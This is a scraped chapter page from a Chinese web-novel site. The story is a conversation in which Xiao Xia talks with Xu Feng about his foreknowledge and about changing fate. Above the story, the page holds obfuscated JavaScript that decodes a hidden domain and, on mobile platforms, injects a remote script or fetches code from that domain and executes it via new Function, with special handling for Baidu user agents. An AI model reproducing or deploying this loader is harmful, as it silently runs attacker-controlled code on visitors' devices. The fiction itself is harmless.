躺着看小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

重生之饲养法则_44(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

闻言萧夏深吸一口气,脸色也有些发白。

“其实说真的,你挺让我意外的,”徐风见他不说话,便又开了口,“沈檀夕与你接触不过四年时间,为什么你会这么信赖他?”

“我与他接触的时间不止四年……”

“什么意思?”

萧夏的表情有些僵硬,轻吐了一口气后,缓缓说道:“我只能说对他的信赖不是莫名的,而是在漫长时间里沉淀过的,或许那对很多人来说十分短暂,但对我来说,却有一生那么长……”

徐风静静听着,哪怕是萧夏偶尔的停顿,他也没有接话。

“檀夕对我的爱有多深,我比谁都清楚,甚至比现在的他自己都要清楚,”萧夏的语速很慢,包间里也很静,这令他看起来有些像是呢喃自语,“或许我畏惧过、逃避过,但是我无法否认他对我来说的重要性,所以即便是这一切都令我感到痛苦,我也选择面对,因为也只有面对,才能改变原本的结局。”

萧夏的最后一句话很像是誓词,徐风听着,隐隐觉得潜藏在这背后的事情,可能并没有那么简单,也没有那么好解决。

“如果这是你保护自己爱情的方式,那我也就不再多问,而且我相信关于那些预知里的事情,你不全部说出,就一定有你的理由,”徐风表示认可,但下一秒就换了个方向探寻,“不过作为朋友,我还是希望你能给我个准话。”

萧夏感激对徐风笑了笑,说:“你尽管问,但凡我能回答你,就一定告诉你。”

048 弱小的人

这世上有一种能力叫坚强,但是很多时候少有差错,就很容易变成逞强,

“那好,上次在小岛的时候,你说再过不了多久欧阳宇就会死,如果你的预言是真的,那我想你现在应该已经在为之努力了,”徐风的语调淡淡的,就像是在阐述一个事实,“所以我很想知道,当你在试图改变的时候,这会不会对你自己造成危险?”

“如果你只指天谴之类的,那我也说不好,因为到现在为止,我还没有真正对原本的生活轨迹产生过什么强烈的影响,都是些不痛不痒的小事而已。”

徐风本想问他的是‘为改变结局而做的这些事情是否存在危险’,但萧夏的回答显然并不是他要的,不过如此认真严肃的回答,也令徐风不得不愈加相信‘预知’这事儿。

“但如果你问的是‘我的所作所为本身是否会对我自己造成危险’……”萧夏犹豫了一下,才说道,“我想应该不会,因为问题的根结点并不复杂,甚至可以说,只是一瞬的抉择而已。”

这样的回答,多少还是令人能放心一些的。

徐风如此想着,但看着萧夏的神情,他还是忍不住说道:“其实有的时候我会觉得你并不是拥有了预知能力,而是你真的经历过它们,所以你才能说出今天的这些话来,”他顿了一下,又笑道,“说真的,萧夏,你与我认知里的那个模样完全不同,从前的时候,我甚至无法想像可以像现在这样与你交谈。”

“或许你这么理解也可以,而且就算无法想像,现在也都是事实了,”萧夏浅浅地笑了笑,继续说道,“总之,我希望自己不要再像从前那样总给大家添麻烦,哪怕能为大家做的并不多,也好过从前那样。”

“也是,你现在这样确实比从前更令人放心一些了,至少健康上没什么大碍,他也就不用总为这事替你发愁了。”

“是啊~”萧夏笑着点头,说道,“既然老天爷都替我解决了最大的苦难,那我还有什么理由不好好活着呢?”

徐风被他的话逗了一乐:“你说这话就跟死过一遍似的。”

萧夏没说话,只是定睛看了徐风几秒。徐风被他的眼神弄得有一瞬慌神,反应过来的时候,这小孩子竟然已经去结账了——他一工作好几年的成年人竟然让一还上大学的孩子结了账说出去简直丢死人啊!

“一次下午茶而已,我就不跟你aa制了(徐风:……),”萧夏将**夹回钱包,又说道,“而且我用的钱可不是零花钱,”他又故作冥想,然后似是打趣般看向徐风,“若真说起来,怕是你转职之后,还不一定有我赚得多。”

徐风并不觉得尴尬,反倒觉得这样的语言技巧更像是给他台阶。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间
上一章
目录
下一页